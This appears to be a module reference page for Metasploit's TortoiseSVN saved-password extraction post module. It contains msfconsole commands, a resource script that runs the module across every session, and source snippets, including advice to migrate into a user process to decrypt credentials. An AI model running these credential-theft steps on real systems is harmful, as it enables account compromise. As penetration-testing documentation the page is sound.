Windows Gather TortoiseSVN Saved Password Extraction - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/tortoisesvn metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather TortoiseSVN Saved Password Extraction
Module: post/windows/gather/credentials/tortoisesvn
Source code: modules/post/windows/gather/credentials/tortoisesvn.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module extracts and decrypts saved TortoiseSVN passwords. In order for decryption to be successful this module must be executed under the same privileges as the user which originally encrypted the password.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/tortoisesvn

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/tortoisesvn
msf post(tortoisesvn) > show options
    ... show and set options ...
msf post(tortoisesvn) > set SESSION session-id
msf post(tortoisesvn) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/tortoisesvn")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/tortoisesvn post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/tortoisesvn

msf6 post(windows/gather/credentials/tortoisesvn) > show info

       Name: Windows Gather TortoiseSVN Saved Password Extraction
     Module: post/windows/gather/credentials/tortoisesvn
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Justin Cacak

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts and decrypts saved TortoiseSVN passwords. In 
  order for decryption to be successful this module must be executed 
  under the same privileges as the user which originally encrypted the 
  password.

Module Options


This is a complete list of options available in the windows/gather/credentials/tortoisesvn post exploitation module:

msf6 post(windows/gather/credentials/tortoisesvn) > show options

Module options (post/windows/gather/credentials/tortoisesvn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/tortoisesvn post exploitation module:

msf6 post(windows/gather/credentials/tortoisesvn) > show advanced

Module advanced options (post/windows/gather/credentials/tortoisesvn):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/tortoisesvn module can do:

msf6 post(windows/gather/credentials/tortoisesvn) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/tortoisesvn post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/tortoisesvn) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Exception raised: <E.MESSAGE>


Here is a relevant code snippet related to the "Exception raised: <E.MESSAGE>" error message:

107:	        next if file_name == "." or file_name == ".."
108:	
109:	        savedpwds = analyze_file(path + file_name)
110:	      end
111:	    rescue => e
112:	      print_error "Exception raised: #{e.message}"
113:	      print_status("No configuration files located: TortoiseSVN may not be installed or configured.")
114:	      return
115:	    end
116:	
117:	    if savedpwds == 0

No configuration files located: TortoiseSVN may not be installed or configured.


Here is a relevant code snippet related to the "No configuration files located: TortoiseSVN may not be installed or configured." error message:

108:	
109:	        savedpwds = analyze_file(path + file_name)
110:	      end
111:	    rescue => e
112:	      print_error "Exception raised: #{e.message}"
113:	      print_status("No configuration files located: TortoiseSVN may not be installed or configured.")
114:	      return
115:	    end
116:	
117:	    if savedpwds == 0
118:	      print_status("No configuration files located")

No configuration files located


Here is a relevant code snippet related to the "No configuration files located" error message:

113:	      print_status("No configuration files located: TortoiseSVN may not be installed or configured.")
114:	      return
115:	    end
116:	
117:	    if savedpwds == 0
118:	      print_status("No configuration files located")
119:	    end
120:	  end
121:	
122:	  def report_cred(opts)
123:	    service_data = {

<Unknown/Error>


Here is a relevant code snippet related to the "<Unknown/Error>" error message:

172:	            host = $2
173:	            portnum = $3
174:	            portnum.gsub! "\r", "" # Remove \r (not common)
175:	          end
176:	        else
177:	          url = "<Unknown/Error>"
178:	        end
179:	      elsif line_num == 16
180:	        user_name = line
181:	        user_name.gsub! "\r", "" # Remove \r (not common)
182:	      end

<Unknown/Error>


Here is a relevant code snippet related to the "<Unknown/Error>" error message:

183:	    end
184:	    config.close
185:	
186:	    # Handle null values or errors
187:	    if user_name == nil
188:	      user_name = "<Unknown/Error>"
189:	    end
190:	
191:	    # Output results to screen
192:	    print_status("     URL: #{url}")
193:	    print_status("     Realm: #{realm}")

This module is running under <UID>.


Here is a relevant code snippet related to the "This module is running under <UID>." error message:

219:	  def run
220:	    # Get uid.  Decryption will only work if executed under the same user account as the password was encrypted.
221:	    uid = session.sys.config.getuid
222:	
223:	    if is_system?
224:	      print_error("This module is running under #{uid}.")
225:	      print_error("Automatic decryption will not be possible.")
226:	      print_error("Manually migrate to a user process to achieve successful decryption (e.g. explorer.exe).")
227:	    else
228:	      print_status("Searching for TortoiseSVN...")
229:	      prepare_railgun

Automatic decryption will not be possible.


Here is a relevant code snippet related to the "Automatic decryption will not be possible." error message:

220:	    # Get uid.  Decryption will only work if executed under the same user account as the password was encrypted.
221:	    uid = session.sys.config.getuid
222:	
223:	    if is_system?
224:	      print_error("This module is running under #{uid}.")
225:	      print_error("Automatic decryption will not be possible.")
226:	      print_error("Manually migrate to a user process to achieve successful decryption (e.g. explorer.exe).")
227:	    else
228:	      print_status("Searching for TortoiseSVN...")
229:	      prepare_railgun
230:	      get_config_files

Manually migrate to a user process to achieve successful decryption (e.g. explorer.exe).


Here is a relevant code snippet related to the "Manually migrate to a user process to achieve successful decryption (e.g. explorer.exe)." error message:

221:	    uid = session.sys.config.getuid
222:	
223:	    if is_system?
224:	      print_error("This module is running under #{uid}.")
225:	      print_error("Automatic decryption will not be possible.")
226:	      print_error("Manually migrate to a user process to achieve successful decryption (e.g. explorer.exe).")
227:	    else
228:	      print_status("Searching for TortoiseSVN...")
229:	      prepare_railgun
230:	      get_config_files
231:	      get_proxy_data

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Justin Cacak

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.